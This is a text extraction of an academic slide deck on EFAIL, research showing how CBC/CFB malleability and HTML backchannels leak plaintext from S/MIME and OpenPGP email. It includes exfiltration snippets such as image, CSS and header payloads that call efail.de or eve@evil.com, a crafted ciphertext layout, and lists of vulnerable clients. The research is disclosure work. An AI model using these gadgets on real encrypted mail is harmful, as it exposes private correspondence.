EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING - - PowerPoint PPT Presentation

efail
SMART_READER_LITE
LIVE PREVIEW

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING - - PowerPoint PPT Presentation

Jul 12, 2023 253 likes •676 views

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de | https://www.efail.de 1 Mnster University of Applied Sciences Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , 2 Ruhr

slide-1
SLIDE 1

EFAIL

BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 1

Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2

1 Münster University of Applied Sciences 2 Ruhr University Bochum 3 NXP Semiconductors

mail@efail.de | https://www.efail.de

slide-2
SLIDE 2

Nation state attackers

  • Massive collection of emails
  • Snowden revelations on pervasive surveillance

Breach of email provider / email account

  • Single point of failure
  • Aren’t they reading / analyzing my emails anyway?

Insecure transport

  • TLS might be used – we don’t know in advance!

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 2

Motivation for email encryption

slide-3
SLIDE 3

OpenPGP (RFC 4880)

  • Favored by privacy advocates
  • Web-of-trust (no authorities)

S/MIME (RFC 5751)

  • Favored by organizations
  • Multi root trust hierarchies

3

Email e2e encryption

TWO COMPETING STANDARDS

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-4
SLIDE 4

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 4

Security of email encryption

?

Request/response protocols Email is non-interactive

slide-5
SLIDE 5

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

5

Backchannel techniques

<img src="http://efail.de"> <object data="ftp://efail.de"> <style>@import '//efail.de'</style> ...

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-6
SLIDE 6

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

6

Backchannel techniques

Disposition-Notification-To: eve@evil.com Remote-Attachment-URL: http://efail.de X-Image-URL: http://efail.de …

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-7
SLIDE 7

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

7

Backchannel techniques

PDF, SVG, VCards, etc.

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-8
SLIDE 8

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

8

Backchannel techniques

OCSP, CRL, intermediate certs

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-9
SLIDE 9

Windows Linux macOS iOS Android Webmail Webapp

Outlook IBM Notes Postbox Foxmail Live Mail Pegasus The Bat! Mulberry eM Client

Thunderbird

Evolution KMail Trojitá Claws Mutt

Apple Mail

Airmail MailMate Mail App

CanaryMail

Outlook K-9 Mail R2Mail MailDroid Nine GMail

Outlook.com

Yahoo! iCloud GMX

HushMail

Mail.ru FastMail

Roundcube

RainLoop AfterLogic

Horde IMP

ProtonMail

Mailfence Mailbox ZoHo Mail

No user interaction User interaction Leak via bypass

W8Mail W10Mail WLMail

Mailpile Exchange GroupWise

9

Evaluation of backchannels in email clients

Javascript execution

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-10
SLIDE 10

Windows Linux macOS iOS Android Webmail Webapp

Outlook IBM Notes Postbox Foxmail Live Mail Pegasus The Bat! Mulberry eM Client

Thunderbird

Evolution KMail Trojitá Claws Mutt

Apple Mail

Airmail MailMate Mail App

CanaryMail

Outlook K-9 Mail R2Mail MailDroid Nine GMail

Outlook.com

Yahoo! iCloud GMX

HushMail

Mail.ru FastMail

Roundcube

RainLoop AfterLogic

Horde IMP

ProtonMail

Mailfence Mailbox ZoHo Mail

No user interaction User interaction Leak via bypass

W8Mail W10Mail WLMail

Mailpile Exchange GroupWise

10

Evaluation of backchannels in email clients

Javascript execution

40/47 clients have backchannels requiring no user interaction

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-11
SLIDE 11

11

Attacker model

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-12
SLIDE 12

12

Attacker model

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-13
SLIDE 13

S/MIME

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 13

slide-14
SLIDE 14

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 14

Malleability of CBC

decryption

C1 P0

decryption

C2 P1 C0

slide-15
SLIDE 15

1 1 1 1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 15

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1

C0

slide-16
SLIDE 16

1 1 1 1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 16

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1

C0

slide-17
SLIDE 17

1 1 1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 17

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1

C0

slide-18
SLIDE 18

1 1 1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 18

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1 1

C0

slide-19
SLIDE 19

1 1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 19

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1 1

C0

slide-20
SLIDE 20

1 1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 20

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1

C0

slide-21
SLIDE 21

1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 21

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1

C0

slide-22
SLIDE 22

1 1 1 1 1

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 22

Malleability of CBC

decryption

C1 P0

decryption

C2 P1

1 1 1 1

?

C0

slide-23
SLIDE 23

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 23

Malleability of CBC

decryption

Content-type: te

C1 P0

decryption

xt/html\nDear Bob

C2 P1 C0

slide-24
SLIDE 24

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 24

Malleability of CBC

decryption

Zontent-type: te

C1 P0'

decryption

xt/html\nDear Bob

C2 P1 C0'

slide-25
SLIDE 25

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 25

Malleability of CBC

C0 ⊕ P0

decryption

0000000000000000

C1 P0'

decryption

xt/html\nDear Bob

C2 P1

CBC Gadget

slide-26
SLIDE 26

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 26

Malleability of CBC

C0 ⊕ P0 ⊕ Pc

decryption

<img src=”ev.il/

C1 P0'

decryption

xt/html\nDear Bob

C2 P1

slide-27
SLIDE 27

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 27

Malleability of CBC

decryption

Content-type: te

C1' P0'

decryption

Zt/html\nDear Bob

C2 P1' C0

slide-28
SLIDE 28

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 28

Malleability of CBC

decryption

????????????????

C1' P0'

decryption

Zt/html\nDear Bob

C2 P1' C0

slide-29
SLIDE 29

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 29

Attacking S/MIME

No MAC

slide-30
SLIDE 30

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 30

Attacking S/MIME

PRACTICAL ATTACK AGAINST S/MIME

???????????????? <base " ???????????????? <img " ???????????????? " href="http:"> Content-type: te xt/html\nDear Sir

  • r Madam, the se

ecret meeting wi ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir

  • r Madam, the se

ecret meeting wi ???????????????? "> Original Crafted

Changing Duplicating Reordering

G E T / . . . D e a r % 2 S i r % 2

  • r

% 2 M a d a m % 2 C % 2 t h e % 2 s e c r e t % 2 m e e t i n g % 2 w i . . . H T T P / 1 . 1 H

  • s

t : e f a i l . d e

slide-31
SLIDE 31

31

Practical attack against S/MIME

ATTACKER MODEL

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-32
SLIDE 32

OpenPGP

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 32

slide-33
SLIDE 33
  • OpenPGP uses a variation of CFB-Mode
  • OpenPGP defines primitives for integrity protection
  • Plaintext compression is enabled by default

33

Attacking OpenPGP

DIFFERENCES TO S/MIME

Ci Pi (known) Ci+1 Pi-1

encryption encryption

X Ci

encryption

Pc (chosen)

random plaintext

? ? ? ? ? ? ? ?

encryption

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-34
SLIDE 34

34

Attacking OpenPGP

DEFEATING INTEGRITY PROTECTION Vulnerable Not Vulnerable

Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE

Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-35
SLIDE 35

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 35

Attacking OpenPGP

RFC 4880 ON MODIFICATION DETECTION CODES

slide-36
SLIDE 36

36 22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-37
SLIDE 37

S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11

  • References EFAIL paper
  • Recommends usage of authenticated encryption

OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05

  • Deprecates Symmetrically Encrypted (SE) data packets (due to downgrade attack)
  • Proposes chunk size limits for AEAD protected data packets
  • Implementations should not allow users to access modified plaintexts

37

Impact on the standards

CURRENT DRAFTS

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk

slide-38
SLIDE 38

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 38

S/MIME OpenPGP

slide-39
SLIDE 39

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 43

Disclosure

slide-40
SLIDE 40

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 44

Disclosure

slide-41
SLIDE 41
  • Introduced malleability gadgets
  • Self-exfiltrating plaintexts
  • Evaluation of backchannels
  • Crypto standards need to evolve
  • Current S/MIME is broken
  • OpenPGP needs clarification
  • Secure HTML email is challenging

45

Conclusions

Thank you! Questions?

https://www.efail.de/

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk